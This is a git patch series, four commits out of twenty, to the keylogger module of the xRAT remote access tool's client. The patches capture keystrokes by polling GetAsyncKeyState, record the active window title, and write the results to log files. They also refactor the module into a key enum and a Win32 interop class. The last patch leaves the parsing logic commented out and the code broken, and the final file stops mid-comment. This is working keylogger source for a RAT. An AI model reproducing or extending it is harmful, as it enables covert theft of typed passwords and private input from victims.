From 5b3e654a4a5499325f60fbcb40f5fb92e01b8974 Mon Sep 17 00:00:00 2001 From: Justin Yanke Date: Thu, 7 May 2015 08:20:54 -0400 Subject: [PATCH 01/20] Fix incorrect logging of special key combinations Should fix https://github.com/MaxXor/xRAT/issues/98 --- Client/Core/Keylogger/Logger.cs | 29 ++++++++--------------------- 1 file changed, 8 insertions(+), 21 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 60536474..f5d3973b 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -213,26 +213,13 @@ namespace xClient.Core.Keylogger default: if (_enumValues.Contains(k.Value)) { - if (k.AltKey && k.ControlKey && k.ShiftKey) - { - _logFileBuffer.Append(HighlightSpecialKey("SHIFT-CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock))); - } - else if (k.AltKey && k.ControlKey && !k.ShiftKey) - { - _logFileBuffer.Append(HighlightSpecialKey("CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock))); - } - else if (k.AltKey && !k.ControlKey) - { - _logFileBuffer.Append(HighlightSpecialKey("ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock))); - } - else if (k.ControlKey && !k.AltKey) - { - _logFileBuffer.Append(HighlightSpecialKey("CTRL-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock))); - } - else - { - _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); - } + _logFileBuffer.Append( + HighlightSpecialKey( + ((k.ShiftKey) ? "SHIFT-" : string.Empty) + + ((k.ControlKey) ? "CTRL-" : string.Empty) + + ((k.AltKey) ? "ALT-" : string.Empty) + + FromKeys(k.Value, k.ShiftKey, k.CapsLock) + )); } break; } @@ -354,4 +341,4 @@ namespace xClient.Core.Keylogger //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread } } -} \ No newline at end of file +} From 3da57543f7a1749660e13d68266425d8799d33a2 Mon Sep 17 00:00:00 2001 From: Justin Yanke Date: Thu, 7 May 2015 08:29:17 -0400 Subject: [PATCH 02/20] Added Escape Key to Keylogger Should resolve https://github.com/MaxXor/xRAT/issues/95 --- Client/Core/Keylogger/Logger.cs | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index f5d3973b..6706bf1f 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -87,6 +87,14 @@ namespace xClient.Core.Keylogger return Control.IsKeyLocked(Keys.CapsLock); //Returns true if Capslock is toggled on } } + + private static bool EscapeKey + { + get + { + return Convert.ToBoolean(GetAsyncKeyState(Keys.EscapeKey) & 0x8000); //Returns true if Escape is pressed + } + } private StringBuilder _logFileBuffer; private string _hWndTitle; @@ -218,6 +226,7 @@ namespace xClient.Core.Keylogger ((k.ShiftKey) ? "SHIFT-" : string.Empty) + ((k.ControlKey) ? "CTRL-" : string.Empty) + ((k.AltKey) ? "ALT-" : string.Empty) + + ((k.EscapeKey) ? "ESC-" : string.Empty) + FromKeys(k.Value, k.ShiftKey, k.CapsLock) )); } From b59cee60258b99bc4a656b29f5373f1de2f999e3 Mon Sep 17 00:00:00 2001 From: Justin Yanke Date: Thu, 7 May 2015 09:15:12 -0400 Subject: [PATCH 03/20] Fixed highlighting keys that are not special --- Client/Core/Keylogger/Logger.cs | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 6706bf1f..14a3def3 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -221,14 +221,21 @@ namespace xClient.Core.Keylogger default: if (_enumValues.Contains(k.Value)) { - _logFileBuffer.Append( - HighlightSpecialKey( - ((k.ShiftKey) ? "SHIFT-" : string.Empty) + - ((k.ControlKey) ? "CTRL-" : string.Empty) + - ((k.AltKey) ? "ALT-" : string.Empty) + - ((k.EscapeKey) ? "ESC-" : string.Empty) + - FromKeys(k.Value, k.ShiftKey, k.CapsLock) - )); + if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) + { + _logFileBuffer.Append( + HighlightSpecialKey( + ((k.ShiftKey) ? "SHIFT-" : string.Empty) + + ((k.ControlKey) ? "CTRL-" : string.Empty) + + ((k.AltKey) ? "ALT-" : string.Empty) + + ((k.EscapeKey) ? "ESC-" : string.Empty) + + FromKeys(k.Value, k.ShiftKey, k.CapsLock) + )); + } + else + { + _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); + } } break; } From 0ab83c4917a3a8776d3b0e9b9607ec79794aaefc Mon Sep 17 00:00:00 2001 From: yankejustin Date: Fri, 8 May 2015 14:08:39 -0400 Subject: [PATCH 04/20] Initial big changes to Keylogger Big changes to the Keylogger. Still needs lots of changes but my intent should be visible by these changes. This is now very flexible, easy to change and add keys, etc. --- Client/Client.csproj | 4 + Client/Core/Keylogger/KeyloggerAttributes.cs | 26 + Client/Core/Keylogger/KeyloggerHelpers.cs | 16 + Client/Core/Keylogger/KeyloggerKeys.cs | 871 +++++++++++++++++++ Client/Core/Keylogger/Logger.cs | 195 ++--- Client/Core/Keylogger/Win32.cs | 50 ++ 6 files changed, 1052 insertions(+), 110 deletions(-) create mode 100644 Client/Core/Keylogger/KeyloggerAttributes.cs create mode 100644 Client/Core/Keylogger/KeyloggerHelpers.cs create mode 100644 Client/Core/Keylogger/KeyloggerKeys.cs create mode 100644 Client/Core/Keylogger/Win32.cs diff --git a/Client/Client.csproj b/Client/Client.csproj index 4389f566..94a6bd77 100644 --- a/Client/Client.csproj +++ b/Client/Client.csproj @@ -64,6 +64,10 @@ + + + + diff --git a/Client/Core/Keylogger/KeyloggerAttributes.cs b/Client/Core/Keylogger/KeyloggerAttributes.cs new file mode 100644 index 00000000..d3dd435d --- /dev/null +++ b/Client/Core/Keylogger/KeyloggerAttributes.cs @@ -0,0 +1,26 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace xClient.Core.Keylogger +{ + [AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)] + public class KeyloggerKey : Attribute + { + public string KeyName { get; private set; } + public bool IsSpecialKey { get; private set; } + + /// + /// Constructs the attribute used by the keylogger + /// keys to hold data for them. + /// + /// The printed value of the key when converting + /// the specific key to its string value. + /// Determines if the key is a special key. + internal KeyloggerKey(string PrintedName, bool _IsSpecialKey = false) + { + KeyName = PrintedName; + IsSpecialKey = _IsSpecialKey; + } + } +} \ No newline at end of file diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs new file mode 100644 index 00000000..ea381659 --- /dev/null +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -0,0 +1,16 @@ +using System; +using System.Collections.Generic; +using System.Text; +using System.Reflection; +using xClient.Core.Keylogger; + +namespace xClient.Core.Keylogger +{ + public static class KeyloggerHelpers + { + public static byte GetKeyloggerKeyValue(this Enum sender) where T : KeyloggerKey + { + return Convert.ToByte(sender); + } + } +} \ No newline at end of file diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs new file mode 100644 index 00000000..fc791588 --- /dev/null +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -0,0 +1,871 @@ +/* + * + * Key information was obtained from this reference: + * https://msdn.microsoft.com/en-us/library/windows/desktop/dd375731%28v=vs.85%29.aspx + * + */ + +using System; +using System.Collections.Generic; +using System.Text; + +namespace xClient.Core.Keylogger +{ + /// + /// Contains various keys that the keylogger supports. + /// + // Add Flags attribute so we can treat these as elements + // that could be used in combination, instead of the usual + // treatment as mutually exclusive elements. + [Flags] + public enum KeyloggerKeys : byte + { + #region Mouse Buttons + + /// + /// The left mouse button. + /// + VK_LBUTTON = 0x01, + /// + /// The right mouse button. + /// + VK_RBUTTON = 0x02, + + /// + /// Middle mouse button (three-button mouse). + /// + VK_MBUTTON = 0x04, + /// + /// X1 mouse button. + /// + VK_XBUTTON1 = 0x05, + /// + /// X2 mouse button. + /// + VK_XBUTTON2 = 0x06, + + #endregion + + #region Common Keys + + /// + /// Control-break processing. + /// + [KeyloggerKey("[CANCEL]", true)] + VK_CANCEL = 0x03, + + /// + /// BACKSPACE key. + /// + [KeyloggerKey("[BACKSPACE]", true)] + VK_BACK = 0x08, + + /// + /// TAB key. + /// + [KeyloggerKey("[TAB]", true)] + VK_TAB = 0x09, + + /// + /// CLEAR key. + /// + [KeyloggerKey("[CLEAR]", true)] + VK_CLEAR = 0x0C, + + /// + /// ENTER key. + /// + [KeyloggerKey("[ENTER]", true)] + VK_RETURN = 0x0D, + + /// + /// SHIFT key. + /// + [KeyloggerKey("[SHIFT]", true)] + VK_SHIFT = 0x10, + + /// + /// CONTROL (CTRL) key. + /// + [KeyloggerKey("[CTRL]", true)] + VK_CONTROL = 0x11, + + /// + /// ALT key. + /// + [KeyloggerKey("[ALT]", true)] + VK_MENU = 0x12, + + /// + /// PAUSE key. + /// + [KeyloggerKey("[PAUSE]", true)] + VK_PAUSE = 0x13, + + /// + /// CAPS LOCK key. + /// + [KeyloggerKey("[CAPS]", true)] + VK_CAPITAL = 0x14, + + /// + /// ESC key. + /// + [KeyloggerKey("[ESC]", true)] + VK_ESCAPE = 0x1B, + + /// + /// SPACEBAR key. + /// + [KeyloggerKey("[SPACE]", true)] + VK_SPACE = 0x20, + + /// + /// PAGE UP key. + /// + [KeyloggerKey("[PAGE_UP]", true)] + VK_PRIOR = 0x21, + + /// + /// PAGE DOWN key. + /// + [KeyloggerKey("[PAGE_DOWN]", true)] + VK_NEXT = 0x22, + + /// + /// END key. + /// + [KeyloggerKey("[END]", true)] + VK_END = 0x23, + + /// + /// HOME key. + /// + [KeyloggerKey("[HOME]", true)] + VK_HOME = 0x24, + + /// + /// LEFT ARROW key. + /// + [KeyloggerKey("[ARROW_LEFT]", true)] + VK_LEFT = 0x25, + + /// + /// UP ARROW key. + /// + [KeyloggerKey("[ARROW_DOWN]", true)] + VK_UP = 0x26, + + /// + /// RIGHT ARROW key. + /// + [KeyloggerKey("[ARROW_RIGHT]", true)] + VK_RIGHT = 0x27, + + /// + /// DOWN ARROW key. + /// + [KeyloggerKey("[ARROW_DOWN]", true)] + VK_DOWN = 0x28, + + /// + /// SELECT key. + /// + [KeyloggerKey("[SELECT]", true)] + VK_SELECT = 0x29, + + /// + /// PRINT key. + /// + [KeyloggerKey("[PRINT]", true)] + VK_PRINT = 0x2A, + + /// + /// EXECUTE key. + /// + [KeyloggerKey("[EXECUTE]", true)] + VK_EXECUTE = 0x2B, + + /// + /// PRINT SCREEN key. + /// + [KeyloggerKey("[PRINT_SCREEN]", true)] + VK_SNAPSHOT = 0x2C, + + /// + /// INSERT (INS) key. + /// + [KeyloggerKey("[INSERT]", true)] + VK_INSERT = 0x2D, + + /// + /// DELETE (DEL) key. + /// + [KeyloggerKey("[DEL]", true)] + VK_DELETE = 0x2E, + + /// + /// HELP key. + /// + [KeyloggerKey("[HELP]", true)] + VK_HELP = 0x2F, + + #endregion + + #region Number Keys + + /// + /// 0 key. + /// + [KeyloggerKey("0")] + K_0 = 0x30, + + /// + /// 1 key. + /// + [KeyloggerKey("1")] + K_1 = 0x31, + + /// + /// 2 key. + /// + [KeyloggerKey("2")] + K_2 = 0x32, + + /// + /// 3 key. + /// + [KeyloggerKey("3")] + K_3 = 0x33, + + /// + /// 4 key. + /// + [KeyloggerKey("4")] + K_4 = 0x34, + + /// + /// 5 key. + /// + [KeyloggerKey("5")] + K_5 = 0x35, + + /// + /// 6 key. + /// + [KeyloggerKey("6")] + K_6 = 0x36, + + /// + /// 7 key. + /// + [KeyloggerKey("7")] + K_7 = 0x37, + + /// + /// 8 key. + /// + [KeyloggerKey("8")] + K_8 = 0x38, + + /// + /// 9 key. + /// + [KeyloggerKey("9")] + K_9 = 0x39, + + #endregion + + #region Alpha Keys + + /// + /// 'A' key. + /// + [KeyloggerKey("a")] + K_A = 0x41, + + /// + /// 'B' key. + /// + [KeyloggerKey("b")] + K_B = 0x42, + + /// + /// 'C' key. + /// + [KeyloggerKey("c")] + K_C = 0x43, + + /// + /// 'D' key. + /// + [KeyloggerKey("d")] + K_D = 0x44, + + /// + /// 'E' key. + /// + [KeyloggerKey("e")] + K_E = 0x45, + + /// + /// 'F' key. + /// + [KeyloggerKey("f")] + K_F = 0x46, + + /// + /// 'G' key. + /// + K_G = 0x47, + + /// + /// 'H' key. + /// + K_H = 0x48, + + /// + /// 'I' key. + /// + K_I = 0x49, + + /// + /// 'J' key. + /// + K_J = 0x4A, + + /// + /// 'K' key. + /// + K_K = 0x4B, + + /// + /// 'L' key. + /// + K_L = 0x4C, + + /// + /// 'M' key. + /// + K_M = 0x4D, + + /// + /// 'N' key. + /// + K_N = 0x4E, + + /// + /// 'O' key. + /// + K_O = 0x4F, + + /// + /// 'P' key. + /// + K_P = 0x50, + + /// + /// 'Q' key. + /// + K_Q = 0x51, + + /// + /// 'R' key. + /// + K_R = 0x52, + + /// + /// 'S' key. + /// + K_S = 0x53, + + /// + /// 'T' key. + /// + K_T = 0x54, + + /// + /// 'U' key. + /// + K_U = 0x55, + + /// + /// 'V' key. + /// + K_V = 0x56, + + /// + /// 'W' key. + /// + K_W = 0x57, + + /// + /// 'X' key. + /// + K_X = 0x58, + + /// + /// 'Y' key. + /// + K_Y = 0x59, + + /// + /// 'Z' key. + /// + K_Z = 0x5A, + + #endregion + + #region Windows keys + + /// + /// Left Windows key (Natural keyboard). + /// + VK_LWIN = 0x5B, + + /// + /// Right Windows key (Natural keyboard). + /// + VK_RWIN = 0x5C, + + /// + /// Applications key (natural keyboard). + /// + VK_APPS = 0x5D, + + /// + /// Computer Sleep key. + /// + VK_SLEEP = 0x5F, + + #endregion + + #region Number Keys (Keypad) + + /// + /// Numeric keypad 0 key. + /// + VK_NUMPAD0 = 0x60, + + /// + /// Numeric keypad 1 key. + /// + VK_NUMPAD1 = 0x61, + + /// + /// Numeric keypad 2 key. + /// + VK_NUMPAD2 = 0x62, + + /// + /// Numeric keypad 3 key. + /// + VK_NUMPAD3 = 0x63, + + /// + /// Numeric keypad 4 key. + /// + VK_NUMPAD4 = 0x64, + + /// + /// Numeric keypad 5 key. + /// + VK_NUMPAD5 = 0x65, + + /// + /// Numeric keypad 6 key. + /// + VK_NUMPAD6 = 0x66, + + /// + /// Numeric keypad 7 key. + /// + VK_NUMPAD7 = 0x67, + + /// + /// Numeric keypad 8 key. + /// + VK_NUMPAD8 = 0x68, + + /// + /// Numeric keypad 0 key. + /// 9 + VK_NUMPAD9 = 0x69, + + #endregion + + #region Command Keys (Keypad) + + /// + /// Multiply key. + /// + VK_MULTIPLY = 0x6A, + + /// + /// Add key. + /// + VK_ADD = 0x6B, + + /// + /// Separator key. + /// + VK_SEPARATOR = 0x6C, + + /// + /// Subtract (-) key. + /// + VK_SUBTRACT = 0x6D, + + /// + /// Decimal (.) key. + /// + VK_DECIMAL = 0x6E, + + /// + /// Divide (/) key. + /// + VK_DIVIDE = 0x6F, + + #endregion + + #region Function Keys + + /// + /// F1 key. + /// + VK_F1 = 0x70, + + /// + /// F2 key. + /// + VK_F2 = 0x71, + + /// + /// F3 key. + /// + VK_F3 = 0x72, + + /// + /// F4 key. + /// + VK_F4 = 0x73, + + /// + /// F5 key. + /// + VK_F5 = 0x74, + + /// + /// F6 key. + /// + VK_F6 = 0x75, + + /// + /// F7 key. + /// + VK_F7 = 0x76, + + /// + /// F8 key. + /// + VK_F8 = 0x77, + + /// + /// F9 key. + /// + VK_F9 = 0x78, + + /// + /// F10 key. + /// + VK_F10 = 0x79, + + /// + /// F11 key. + /// + VK_F11 = 0x7A, + + /// + /// F12 key. + /// + VK_F12 = 0x7B, + + /// + /// F13 key. + /// + VK_F13 = 0x7C, + + /// + /// F14 key. + /// + VK_F14 = 0x7D, + + /// + /// F15 key. + /// + VK_F15 = 0x7E, + + /// + /// F16 key. + /// + VK_F16 = 0x7F, + + /// + /// F17 key. + /// + VK_F17 = 0x80, + + /// + /// F18 key. + /// + VK_F18 = 0x81, + + /// + /// F19 key. + /// + VK_F19 = 0x82, + + /// + /// F20 key. + /// + VK_F20 = 0x83, + + /// + /// F21 key. + /// + VK_F21 = 0x84, + + /// + /// F22 key. + /// + VK_F22 = 0x85, + + /// + /// F23 key. + /// + VK_F23 = 0x86, + + /// + /// F24 key. + /// + VK_F24 = 0x87, + + #endregion + + #region Various Command Keys + + /// + /// NUM LOCK key. + /// + VK_NUMLOCK = 0x90, + + /// + /// SCROLL LOCK key. + /// + VK_SCROLL = 0x91, + + /// + /// Left SHIFT key. + /// + VK_LSHIFT = 0xA0, + + /// + /// Right SHIFT key. + /// + VK_RSHIFT = 0xA1, + + /// + /// Left CONTROL (CTRL) key. + /// + VK_LCONTROL = 0xA2, + + /// + /// Right CONTROL (CTRL) key. + /// + VK_RCONTROL = 0xA3, + + /// + /// Left MENU key. + /// + VK_LMENU = 0xA4, + + /// + /// Right MENU key. + /// + VK_RMENU = 0xA5, + + /// + /// Browser Back key. + /// + VK_BROWSER_BACK = 0xA6, + + /// + /// Browser Forward key. + /// + VK_BROWSER_FORWARD = 0xA7, + + /// + /// Browser Refresh key. + /// + VK_BROWSER_REFRESH = 0xA8, + + /// + /// Browser Stop key. + /// + VK_BROWSER_STOP = 0xA9, + + /// + /// Browser Search key. + /// + VK_BROWSER_SEARCH = 0xAA, + + /// + /// Browser Favorites key. + /// + VK_BROWSER_FAVORITES = 0xAB, + + /// + /// Browser Start and Home key. + /// + VK_BROWSER_HOME = 0xAC, + + /// + /// Volume Mute key. + /// + VK_VOLUME_MUTE = 0xAD, + + /// + /// Volume Down key. + /// + VK_VOLUME_DOWN = 0xAE, + + /// + /// Volume Up key. + /// + VK_VOLUME_UP = 0xAF, + + /// + /// Start Application 2 key. + /// + VK_LAUNCH_APP2 = 0xB7, + + #endregion + + #region Varying keys (based on locality) + + /// + /// Used for miscellaneous characters; it + /// can vary by keyboard. For the US + /// standard keyboard, the ';:' key. + /// + VK_OEM_1 = 0xBA, + + /// + /// For any country/region, the '+' key. + /// + VK_OEM_PLUS = 0xBB, + + /// + /// For any country/region, the ',' key. + /// + VK_OEM_COMMA = 0xBC, + + /// + /// For any country/region, the '-' key. + /// + VK_OEM_MINUS = 0xBD, + + /// + /// For any country/region, the '.' key. + /// + VK_OEM_PERIOD = 0xBE, + + /// + /// Used for miscellaneous characters; it can vary + /// by keyboard. For the US standard keyboard, + /// the '/?' key. + /// + VK_OEM_2 = 0xBF, + + /// + /// Used for miscellaneous characters; it can vary + /// by keyboard. For the US standard keyboard, + /// the '`~' key. + /// + VK_OEM_3 = 0xC0, + + /// + /// Used for miscellaneous characters; it can vary by + /// keyboard. For the US standard keyboard, the '[{' key. + /// + VK_OEM_4 = 0xDB, + + /// + /// Used for miscellaneous characters; it can vary by keyboard. + /// For the US standard keyboard, the '\\|' key. + /// + VK_OEM_5 = 0xDC, + + /// + /// Used for miscellaneous characters; it can vary by keyboard. + /// For the US standard keyboard, the ']}' key. + /// + VK_OEM_6 = 0xDD, + + /// + /// Used for miscellaneous characters; it can vary by keyboard. + /// For the US standard keyboard, the 'single-quote/double-quote' key. + /// + VK_OEM_7 = 0xDE, + + /// + /// Used for miscellaneous characters; it can vary by keyboard. + /// + VK_OEM_8 = 0xDF, + + /// + /// Either the angle bracket key or the backslash key on the RT 102-key keyboard. + /// + VK_OEM_102 = 0xE2, + + #endregion + + #region Random + + /// + /// Used to pass Unicode characters as if they were keystrokes. + /// The VK_PACKET key is the low word of a 32-bit Virtual Key + /// value used for non-keyboard input methods. For more + /// information, see Remark in KEYBDINPUT, SendInput, + /// WM_KEYDOWN, and WM_KEYUP. + /// + VK_PACKET = 0xE7, + + /// + /// ERASE EOF key. + /// + VK_EREOF = 0xF9, + + /// + /// Play key. + /// + VK_PLAY = 0xFA, + + /// + /// Zoom key. + /// + VK_ZOOM = 0xFB, + + /// + /// PA1 key. + /// + VK_PA1 = 0xFD, + + /// + /// Clear key. + /// + VK_OEM_CLEAR = 0xFE, + + #endregion + } +} \ No newline at end of file diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 14a3def3..6a8af617 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -5,46 +5,17 @@ using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; +using xClient.Core.Keylogger; namespace xClient.Core.Keylogger { - public class KeyData + public struct LoggedKey { - public short Value { get; set; } - public bool ShiftKey { get; set; } - public bool CapsLock { get; set; } - public bool ControlKey { get; set; } - public bool AltKey { get; set; } + public KeyloggerKeys PressedChar { get; set; } } public class Logger { - #region "WIN32API" - - [DllImport("user32.dll")] - private static extern short GetAsyncKeyState(Keys vKey); - - [DllImport("user32.dll")] - private static extern short GetAsyncKeyState(int vKey); - - [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)] - private static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount); - - [DllImport("user32.dll", CharSet = CharSet.Unicode)] - private static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff, - int cchBuff, uint wFlags, IntPtr dwhkl); - - [DllImport("user32.dll")] - private static extern IntPtr GetForegroundWindow(); - - [DllImport("user32.dll")] - private static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); - - [DllImport("user32.dll", ExactSpelling = true)] - internal static extern IntPtr GetKeyboardLayout(uint threadId); - - #endregion - public static Logger Instance; public bool Enabled @@ -60,7 +31,7 @@ namespace xClient.Core.Keylogger { get { - return Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed + return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed } } @@ -68,7 +39,7 @@ namespace xClient.Core.Keylogger { get { - return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed + return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed } } @@ -76,7 +47,7 @@ namespace xClient.Core.Keylogger { get { - return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed + return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed } } @@ -92,7 +63,7 @@ namespace xClient.Core.Keylogger { get { - return Convert.ToBoolean(GetAsyncKeyState(Keys.EscapeKey) & 0x8000); //Returns true if Escape is pressed + return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Escape) & 0x8000); //Returns true if Escape is pressed } } @@ -104,7 +75,7 @@ namespace xClient.Core.Keylogger "\\Logs\\"; private readonly List _enumValues; - private volatile List _keyBuffer; + private volatile List _keyBuffer; private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerEmptyKeyBuffer; private readonly System.Timers.Timer _timerFlush; @@ -120,7 +91,7 @@ namespace xClient.Core.Keylogger WriteFile(); - _keyBuffer = new List(); + _keyBuffer = new List(); _enumValues = new List() //Populate enumValues list with the Virtual Key Codes of the keys we want to log @@ -178,67 +149,69 @@ namespace xClient.Core.Keylogger private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { int j = 0; - KeyData[] keybuffer = new KeyData[_keyBuffer.Count]; + LoggedKey[] keybuffer = new LoggedKey[_keyBuffer.Count]; _keyBuffer.CopyTo(keybuffer); foreach (var k in keybuffer) { - if (k != null) + if (k.PressedChar != null) { - switch (k.Value) - { - case 8: - _logFileBuffer.Append(HighlightSpecialKey("Back")); - break; - case 9: - _logFileBuffer.Append(HighlightSpecialKey("Tab")); - break; - case 13: - _logFileBuffer.Append(HighlightSpecialKey("Enter")); - break; - case 32: - _logFileBuffer.Append(" "); - break; - case 46: - _logFileBuffer.Append(HighlightSpecialKey("Del")); - break; - case 91: - case 92: - _logFileBuffer.Append(HighlightSpecialKey("Win")); - break; - case 112: - case 113: - case 114: - case 115: - case 116: - case 117: - case 118: - case 119: - case 120: - case 121: - case 122: - _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111))); - break; - default: - if (_enumValues.Contains(k.Value)) - { - if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) - { - _logFileBuffer.Append( - HighlightSpecialKey( - ((k.ShiftKey) ? "SHIFT-" : string.Empty) + - ((k.ControlKey) ? "CTRL-" : string.Empty) + - ((k.AltKey) ? "ALT-" : string.Empty) + - ((k.EscapeKey) ? "ESC-" : string.Empty) + - FromKeys(k.Value, k.ShiftKey, k.CapsLock) - )); - } - else - { - _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); - } - } - break; - } + // TODO: RE-WRITE THE WAY IT IS PARSED. + + //switch (k.PressedChar) + //{ + // case 8: + // _logFileBuffer.Append(HighlightSpecialKey("Back")); + // break; + // case 9: + // _logFileBuffer.Append(HighlightSpecialKey("Tab")); + // break; + // case 13: + // _logFileBuffer.Append(HighlightSpecialKey("Enter")); + // break; + // case 32: + // _logFileBuffer.Append(" "); + // break; + // case 46: + // _logFileBuffer.Append(HighlightSpecialKey("Del")); + // break; + // case 91: + // case 92: + // _logFileBuffer.Append(HighlightSpecialKey("Win")); + // break; + // case 112: + // case 113: + // case 114: + // case 115: + // case 116: + // case 117: + // case 118: + // case 119: + // case 120: + // case 121: + // case 122: + // _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111))); + // break; + // default: + // if (_enumValues.Contains(k.Value)) + // { + // if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) + // { + // _logFileBuffer.Append( + // HighlightSpecialKey( + // ((k.ShiftKey) ? "SHIFT-" : string.Empty) + + // ((k.ControlKey) ? "CTRL-" : string.Empty) + + // ((k.AltKey) ? "ALT-" : string.Empty) + + // ((k.EscapeKey) ? "ESC-" : string.Empty) + + // FromKeys(k.Value, k.ShiftKey, k.CapsLock) + // )); + // } + // else + // { + // _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); + // } + // } + // break; + //} } j++; } @@ -250,19 +223,21 @@ namespace xClient.Core.Keylogger { foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log { - if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress + if (Win32.GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress { - _keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShiftKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i}); - _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - if (_hWndTitle != null) - { - if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) - //Only write title to log if a key is pressed that we support - { - _hWndLastTitle = _hWndTitle; - _logFileBuffer.Append("

[" + _hWndTitle + "]
"); - } - } + // TODO: RE-WRITE THE WAY THE KEYBUFFER ADDS A NEW LOGGED KEY. + + //_keyBuffer.Add(new LoggedKey() { PressedChar = i }); + //_hWndTitle = GetActiveWindowTitle(); //Get active thread window title + //if (_hWndTitle != null) + //{ + // if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) + // //Only write title to log if a key is pressed that we support + // { + // _hWndLastTitle = _hWndTitle; + // _logFileBuffer.Append("

[" + _hWndTitle + "]
"); + // } + //} } } } @@ -324,7 +299,7 @@ namespace xClient.Core.Keylogger { StringBuilder sbTitle = new StringBuilder(1024); - GetWindowText(GetForegroundWindow(), sbTitle, sbTitle.Capacity); + Win32.GetWindowText(Win32.GetForegroundWindow().ToInt32(), sbTitle, sbTitle.Capacity); string title = sbTitle.ToString(); @@ -334,7 +309,7 @@ namespace xClient.Core.Keylogger private IntPtr GetActiveKeyboardLayout() { uint pid; - return GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), out pid)); + return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid)); } private char? FromKeys(int keys, bool shift, bool caps) @@ -351,7 +326,7 @@ namespace xClient.Core.Keylogger var sb = new StringBuilder(10); - return ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 + return Win32.ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 ? (char?) sb[0] : null; //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread diff --git a/Client/Core/Keylogger/Win32.cs b/Client/Core/Keylogger/Win32.cs new file mode 100644 index 00000000..93da5a9d --- /dev/null +++ b/Client/Core/Keylogger/Win32.cs @@ -0,0 +1,50 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; +using System.Windows.Forms; + +namespace xClient.Core.Keylogger +{ + public static class Win32 + { + /// + /// Translates (maps) a virtual-key code into a scan code or character value, + /// or translates a scan code into a virtual-key code. The function + /// translates the codes using the input language and an input locale identifier. + /// + /// The virtual-key code or scan code for a key + /// The translation to perform. + /// + /// Returns + [DllImport("user32.dll", CharSet = CharSet.Unicode, EntryPoint = "MapVirtualKeyExW", ExactSpelling = true)] + internal static extern int MapVirtualKeyExW(int uCode, int uMapType, IntPtr dwhkl); + + [DllImport("user32.dll")] + internal static extern short GetAsyncKeyState(Keys vKey); + + // The value passed to GetAsyncKeyState is scan code, so we 